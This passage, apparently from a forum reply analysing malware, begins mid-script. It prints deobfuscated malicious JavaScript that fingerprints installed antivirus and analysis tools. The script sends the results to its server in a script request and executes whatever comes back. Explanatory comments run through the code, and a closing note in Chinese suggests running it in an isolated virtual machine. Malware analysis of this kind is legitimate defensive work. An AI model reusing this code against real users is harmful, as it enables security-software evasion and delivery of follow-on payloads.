rreiqsfd('AVAST SoftwareAvastAvastUI.exe');
rreiqsfd('norton securityBrandingmuis.dll');
rreiqsfd('norton internet securityBrandingmuis.dll');
rreiqsfd('F-Securetrigger.exe');
nrimsm(hntpeeed + 'fsbts.sys');
var siatsii = 'Kaspersky LabKaspersky ';
rreiqsfd(siatsii + 'Total Security 15.0.2avpui.exe');
rreiqsfd(siatsii + 'Internet Security 15.0.2avpui.exe')
rreiqsfd(siatsii + 'Anti-Virus 15.0.2avpui.exe');
rreiqsfd(siatsii + 'Small Office Security 3starter_avp.exe');
nrimsm(hntpeeed + 'driverskbfilter.sys');
var sosvaki = 'Trend Micro';
rreiqsfd(sosvaki + 'TitaniumUIFrameworkuiWinMgr.exe');
rreiqsfd(sosvaki + 'TMIDSPwmConsole.exe');
rreiqsfd('Security AgentPCCNtMon.exe');
rreiqsfd('Client Server Security AgentPccNTMon.exe');
rreiqsfd('Security ServerPCCSRVApache2binApacheMonitor.exe');
rreiqsfd('Browser GuardBGUi.exe');
// analysis / network tooling rather than AV products
rreiqsfd('Fiddler2Fiddler.exe');
rreiqsfd('Fiddler4Fiddler.exe');
rreiqsfd('OpenVPNUninstall.exe');
rreiqsfd('SymantecLiveUpdateMSVCR71.dll');
rreiqsfd('Common FilesSymantec SharedccEvtMgr.exe');
}
setTimeout(stwsiis, 1000);
}, 1500);
// Collection stage (runs once): every probe whose IE-only fileUpdatedDate
// property is non-empty — or throws when read — counts as "found"; the
// indices of found probes are joined with commas and sent to the server as
// the query string of a <script> request ('jlvx.htm?<random>,<i>,<j>,...').
// The response is executed as script, so the server can tailor what follows
// to the products that were (not) detected.
function stwsiis() {
if (datmpeb)
return;
datmpeb = true;
var ctstahjh = '',
ildciea = 0;
// for...in over an array; iterates the index keys
for (var i in raelpit) {
var found = false;
try {
if (raelpit[i]['fileUpdatedDate'] == '')
found = false;
else
found = true;
} catch (e) {
found = true;
}
// true > 0 is true; appends "<index>,"
if (found > 0)
ctstahjh += ildciea + ',';
ildciea++;
}
var nlmata = document['createElement']('script');
// Math.random() is a cache-buster; the relative URL resolves against the page origin
nlmata['src'] = 'jlvx.htm?' + Math.random() + ',' + ctstahjh;
var yilwre = document.body;
yilwre.insertBefore(nlmata,yilwre.firstChild);
}
是的，我敢说有些地方看起来确实很可疑 ;-)
小心!
（另外，抱歉语法高亮没弄好。我现在只能做到这些，必须先走了，抱歉……
你可以在隔离的安全环境中（VirtualBox 或 VMware 虚拟机）重现这段恶意代码；我认为弄清这段 JS 在做什么的最好方法，就是在控制台或浏览器里实际运行它。如果想在控制台中运行，可以使用 https://developer.mozilla.org/es/docs/SpiderMonkey
也许从源代码就能大致看出它在做什么，但如果实际运行这段恶意代码，你就能百分之百地弄清它的行为。
我希望这有帮助。问候。